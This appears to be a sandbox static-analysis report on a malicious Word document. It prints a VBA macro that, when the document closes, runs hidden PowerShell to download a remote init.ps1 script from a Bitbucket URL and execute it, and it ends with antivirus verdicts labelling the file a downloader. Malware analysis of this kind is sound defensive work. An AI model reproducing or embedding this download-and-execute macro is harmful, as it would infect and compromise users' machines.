Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RunCommand()
    Dim script As String
    Dim shellResult As Variant
    script = "Invoke-RestMethod -Uri 'https://bitbucket.org/bypass_workers/main/raw/c3291e02cef4015bdeb6d1e8d6bb23f56afa7afe/init.ps1' | Invoke-Expression"
    shellResult = Shell("powershell.exe -NoProfile -ExecutionPolicy Bypass -Command """ & script & """", vbHide)
End Sub

Private Sub Document_Close()
    RunCommand
End Sub


                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub RunCommand()
    Dim script As String
    Dim shellResult As Variant
    script = "Invoke-RestMethod -Uri 'https://bitbucket.org/bypass_workers/main/raw/c3291e02cef4015bdeb6d1e8d6bb23f56afa7afe/init.ps1' | Invoke-Expression"
    shellResult = Shell("powershell.exe -NoProfile -ExecutionPolicy Bypass -Command """ & script & """", vbHide)
End Sub

Private Sub Document_Close()
    RunCommand
End Sub


                                    
[Content_Types].xml
%[ILn7
d!4I>5yQ*'
TMsL2d
_rels/.rels
word/document.xml
word/_rels/document.xml.rels
,r$M.k4
word/footnotes.xml
<m0Oq)8
word/endnotes.xml
A\#EnA
Exg(tu
word/vbaProject.bin
@?0@lKD;
%~j&wKg
j0ZH[:
V2YgMZ
{,{w:n
CG'3Y+
r^=no#
>Z,*{h(
G]owXMA
t_/d%)Q
M3h-x6~
oZ|39m
[YcKj4
word/vbaProjectSignature.bin
}6U,Tln
nN:L/,+
umG9!Q
TQ_}d1o
XR `PS
D{6[0g
>M}4P+X
8LR%)G+
4v7e@i4lr
|Sc{JG
word/vbaProjectSignatureAgile.bin
H1 EA@P
Y)?9x/
J,l9''
(d<XrZ9}a
yGT<X_
>p9&A1"(APzY]
'qG?p^
>\:dlv
5MA\gm-
word/vbaProjectSignatureV3.bin
#@OE{!
)#/CrQ
78PU3{w
~cc~]3
'")hl0
)2UT9b
IQO6HQ
-L_:*`
H'#gR/{o
}[pn6dZ
d$(.b#WK
[.CQGq
word/theme/theme1.xml
!Ic@Y5
1S{}8D
.kuV@EqU
@<QrF,
!\n>g_;
docProps/thumbnail.emf
Shu?x;
i"jmZ7u
gdSO[N
word/_rels/vbaProject.bin.rels
word/vbaData.xml
word/settings.xml
d_2M9?
word/_rels/settings.xml.rels
-]R5/D]
customXml/item1.xml
l^4G94
customXml/itemProps1.xml
.5{{}NK
customXml/item2.xml
customXml/itemProps2.xml
customXml/item3.xml
4pbuFW
(d7h/.P
E!>\:N
V=I$U`
3L=4jA
2 rKCL
customXml/itemProps3.xml
k'wh]c
word/styles.xml
H%0W~&
iD|:bQ@
'Tho#T
ny"V/[o5
2Q-'U*T
Z*Y[VK%
+|3_\lqR
U}D-b{y
word/webSettings.xml
]?cv0$G
word/fontTable.xml
CNF~jL>
yq$qpR"
docProps/core.xml
Lq!79z]-
docProps/app.xml
j%aI.`
!RU%8l
docProps/custom.xml
,A@EyH
customXml/_rels/item1.xml.rels
customXml/_rels/item2.xml.rels
customXml/_rels/item3.xml.rels
[Content_Types].xmlPK
_rels/.relsPK
word/document.xmlPK
word/_rels/document.xml.relsPK
word/footnotes.xmlPK
word/endnotes.xmlPK
word/vbaProject.binPK
word/vbaProjectSignature.binPK
word/vbaProjectSignatureAgile.binPK
word/vbaProjectSignatureV3.binPK
word/theme/theme1.xmlPK
docProps/thumbnail.emfPK
word/_rels/vbaProject.bin.relsPK
word/vbaData.xmlPK
word/settings.xmlPK
word/_rels/settings.xml.relsPK
customXml/item1.xmlPK
customXml/itemProps1.xmlPK
customXml/item2.xmlPK
customXml/itemProps2.xmlPK
customXml/item3.xmlPK
customXml/itemProps3.xmlPK
word/styles.xmlPK
word/webSettings.xmlPK
word/fontTable.xmlPK
docProps/core.xmlPK
docProps/app.xmlPK
docProps/custom.xmlPK
customXml/_rels/item1.xml.relsPK
customXml/_rels/item2.xml.relsPK
customXml/_rels/item3.xml.relsPK
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
Cynet Malicious (score: 99)
CMC Clean
CAT-QuickHeal Clean
Skyhigh Artemis!Trojan
ALYac Clean
Malwarebytes Clean
Sangfor Trojan.Macro.PowerShell.se
K7AntiVirus Clean
BitDefender Clean
K7GW Clean
Cybereason Clean
BitDefenderTheta Clean
VirIT W97M/Downloader.AE
Symantec ISB.Downloader!gen48
Elastic malicious (high confidence)
ESET-NOD32 Clean
TrendMicro-HouseCall Clean
Trustlook Clean
ClamAV Doc.Downloader.Powershell-10002004-0
Kaspersky UDS:DangerousObject.Multi.Generic
Alibaba Clean
NANO-Antivirus Trojan.Ole2.Vbs-heuristic.druvzi
ViRobot Clean
MicroWorld-eScan Clean
Tencent Office.Trojan-Dropper.Sdrop.Kzfl
Sophos Clean
F-Secure Heuristic.HEUR/Macro.Agent
DrWeb Clean
VIPRE Clean
FireEye Clean
Emsisoft Clean
Jiangmin Clean
Varist Clean
Avira HEUR/Macro.Agent
MAX Clean
Antiy-AVL Trojan[Downloader]/MSOffice.Agent
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Dropper.MSOffice.SDrop.gen
Avast-Mobile Clean
Google Detected.Heuristic.Script
AhnLab-V3 Clean
Acronis Clean
VBA32 Clean
TACHYON Suspicious/WOX.XSR.Gen
Zoner Probably Heur.W97ShellS
Rising Heur.Macro.powershell.a (CLASSIC)
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
Panda Clean
CrowdStrike Clean
alibabacloud Trojan:MSOffice/Macro.Akgpp
No IRMA results available.